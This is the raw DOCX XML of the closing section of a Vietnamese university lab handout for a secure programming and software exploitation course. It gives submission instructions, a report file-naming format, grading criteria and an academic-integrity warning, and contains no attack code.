        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Sinh viên tìm hiểu và thực hành theo hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9255C" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên báo cáo kết quả thực hiện và nộp bài bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>1 trong 2 hình thức</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B087F" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Cách 1: Báo cáo trực tiếp trên lớp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91D451" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00FE352D" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Báo cáo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">trực tiếp kết quả </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">thực hành (có </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">hình </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">ảnh minh họa các bước) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">với GVTH trong buổi học, trả lời các câu hỏi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">và giải thích các vấn đề kèm theo. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288AFBB9" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Cách 2: Nộp </w:t>
      </w:r>
      <w:r w:rsidRPr="00386E9F">
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> báo cáo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7A8F1" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Báo cáo cụ thể quá trình thực hành (có</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> hình</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> ảnh minh họa các bước)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>, trả lời các câu hỏi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> và giải thích các vấn đề kèm theo trong file PDF theo mẫu tại website môn học.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3049235B" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FA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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>Đặt tên file báo cáo theo định dạng như mẫu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE3301" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FA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b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>[Mã lớp]-LabX_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>NhomY_</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>MSSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>_MSSV2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>_MSSV3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675751C7" w14:textId="24770BED" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Ví dụ</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>: [NT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>521</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>ANT</w:t>
      </w:r>
      <w:r w:rsidR="00C77B73">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>1]-Lab</w:t>
      </w:r>
      <w:r w:rsidR="00C77B73">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>Nhom1_20</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>52000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>520999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>_20521000</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE923C7" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Nếu báo cáo có nhiều file, nén tất cả file vào file .ZIP với cùng tên file báo cáo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E381F" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Nộp báo cáo trên theo thời gian đã thống nhất tại website môn học.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8BEB41" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Đánh giá</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD0F55" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Sinh viên hiểu và tự thực hiện được bài thực hành, đóng góp tích cực tại lớp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1E6F4" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Báo cáo trình bày chi tiết, giải thích các bước thực hiện và chứng minh được do nhóm sinh viên thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895E586" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Hoàn tất nội dung cơ bản và có thực hiện nội dung </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>mở rộng – cộng điểm</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> (với lớp </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>ANTN</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69931913" w14:textId="206F8A0F" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả thực hành cũng được đánh giá bằng kiểm tra kết quả trực tiếp tại lớp vào cuối buổi thực hành hoặc vào buổi thực hành thứ </w:t>
      </w:r>
      <w:r w:rsidR="00450DA8">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA65E53" w14:textId="0CABB98E" w:rsidR="00E27E96" w:rsidRPr="00B55FAF" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Lưu ý:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bài sao chép, nộp trễ, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>gánh team</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>”, … sẽ được xử lý tùy mức độ.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3C7D6B1F" w14:textId="77777777" w:rsidR="00884FA0" w:rsidRPr="00B55FAF" w:rsidRDefault="00F93BD4" w:rsidP="00941DFE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55FAF">
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>HẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32835D5A" w14:textId="77777777" w:rsidR="00060B0B" w:rsidRPr="00B55FAF" w:rsidRDefault="00060B0B" w:rsidP="00941DFE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
          <w:i/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55FAF">
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>Chúc các bạn hoàn thành tốt!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00060B0B" w:rsidRPr="00B55FAF" w:rsidSect="00946C14">
      <w:headerReference w:type="default" r:id="rId44"/>
      <w:footerReference w:type="default" r:id="rId45"/>
      <w:headerReference w:type="first" r:id="rId46"/>
      <w:footerReference w:type="first" r:id="rId47"/>
      <w:pgSz w:w="11907" w:h="16839" w:code="9"/>
      <w:pgMar w:top="993"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8C4A" w14:textId="77777777" w:rsidR="00B53237" w:rsidRDefault="00B53237" w:rsidP="00A349CB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="715456FC" w14:textId="77777777" w:rsidR="00B53237" w:rsidRDefault="00B53237" w:rsidP="00A349CB">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="6DF74365" w14:textId="77777777" w:rsidR="00B53237" w:rsidRDefault="00B53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VN Hong Ha Hep">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UTM Trajan Pro Bold">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000007" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000003" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="AvantGarde">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000A87" w:usb1="08000000" w:usb2="00000008" w:usb3="00000000" w:csb0="00000101" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Noto Sans">
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00082FF" w:usb1="400078FF" w:usb2="0000002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2305E1B4" w:rsidR="00811E75" w:rsidRPr="00736266" w:rsidRDefault="00F20ED0" w:rsidP="00CC30BE">
    <w:r w:rsidRPr="00736266">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="36576" distB="36576" distL="36576" distR="36576" simplePos="0" relativeHeight="251658242" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75FFE516" wp14:editId="750480CA">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>-422694</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9963509</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1790700" cy="586597"/>
              <wp:effectExtent l="0" t="0" r="0" b="444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659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BDF3D4"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BỘ MÔN</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E516" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 33" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:-33.3pt;margin-top:784.55pt;width:141pt;height:46.2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tr4QEAALYDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8tu2zAQvBfoPxC815JT2E4Ey0GaIEWB&#10;9AGk/QCKIiWiEpdd0pbcr++Skh23vRW9EFwuObszO9zejn3HDgq9AVvy5SLnTFkJtbFNyb99fXxz&#10;zZ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" filled="f" fillcolor="#fffffe" stroked="f" strokecolor="#212120" insetpen="t">
              <v:textbox inset="2.88pt,2.88pt,2.88pt,2.88pt">
                <w:txbxContent>
                  <w:p w14:paraId="73BDF3D4"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 xml:space="preserve">   BỘ MÔN</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="594012CF" w14:textId="77777777" w:rsidR="00811E75" w:rsidRPr="00F20ED0" w:rsidRDefault="00811E75" w:rsidP="00F20ED0">
                    <w:pPr>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:b/>
                        <w:i/>
                        <w:sz w:val="22"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00F20ED0">
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:b/>
                        <w:i/>
                        <w:sz w:val="22"/>
                      </w:rPr>
                      <w:t>AN TOÀN THÔNG TIN</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="margin" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="000817D5" w:rsidRPr="00736266">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="36576" distB="36576" distL="36576" distR="36576" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48CDB2B4" wp14:editId="164D7DD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64794B1"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000817D5" w:rsidRPr="00736266">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="36576" distB="36576" distL="36576" distR="36576" simplePos="0" relativeHeight="251658241" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35E11112" wp14:editId="1658BE54">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DAF206D"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00FD1FAD" w:rsidRPr="00736266">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="36576" distB="36576" distL="36576" distR="36576" simplePos="0" relativeHeight="251658243" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="658A475F" wp14:editId="04E103D2">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C317" w14:textId="0D786118" w:rsidR="00811E75" w:rsidRPr="0031228C" w:rsidRDefault="006D0D1B" w:rsidP="00F20ED0">
                          <w:pPr>
                            <w:jc w:val="right"/>
                            <w:rPr>
                              <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                              <w:b/>
                              <w:sz w:val="22"/>
                              <w:lang w:val="vi-VN"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00F20ED0">
                            <w:rPr>
                              <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                              <w:b/>
                              <w:sz w:val="22"/>
                            </w:rPr>
                            <w:t xml:space="preserve">THỰC HÀNH </w:t>
                          </w:r>
                          <w:r w:rsidRPr="006D0D1B">
                            <w:rPr>
                              <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                              <w:b/>
                              <w:sz w:val="22"/>
                            </w:rPr>
                            <w:t>LẬP TRÌNH AN TOÀN &amp; KHAI THÁC LỖ HỔNG PHẦN MỀM</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="60A3346D" w14:textId="7AAC491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F2595C">
                            <w:rPr>
                              <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>inseclab</w:t>
                          </w:r>
                          <w:r w:rsidR="0029493F" w:rsidRPr="00F20ED0">
                            <w:rPr>
                              <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                              <w:sz w:val="20"/>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475F" id="Text Box 34" o:spid="_x0000_s1034"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5022C317" w14:textId="0D786118" w:rsidR="00811E75" w:rsidRPr="0031228C" w:rsidRDefault="006D0D1B" w:rsidP="00F20ED0">
                    <w:pPr>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:b/>
                        <w:sz w:val="22"/>
                        <w:lang w:val="vi-VN"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00F20ED0">
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:b/>
                        <w:sz w:val="22"/>
                      </w:rPr>
                      <w:t xml:space="preserve">THỰC HÀNH </w:t>
                    </w:r>
                    <w:r w:rsidRPr="006D0D1B">
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:b/>
                        <w:sz w:val="22"/>
                      </w:rPr>
                      <w:t>LẬP TRÌNH AN TOÀN &amp; KHAI THÁC LỖ HỔNG PHẦN MỀM</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="60A3346D" w14:textId="7AAC491B" w:rsidR="00811E75" w:rsidRPr="00F20ED0" w:rsidRDefault="00811E75" w:rsidP="00F20ED0">
                    <w:pPr>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00F20ED0">
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:sz w:val="7"/>
                      </w:rPr>
                      <w:tab/>
                    </w:r>
                    <w:r w:rsidR="00F2595C">
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>inseclab</w:t>
                    </w:r>
                    <w:r w:rsidR="0029493F" w:rsidRPr="00F20ED0">
                      <w:rPr>
                        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>@uit.edu.vn</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="page" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00736266"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61B813D8" w:rsidR="008A3FFF" w:rsidRPr="008A3FFF" w:rsidRDefault="00C111DD" w:rsidP="00C111DD">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:i/>
        <w:iCs/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
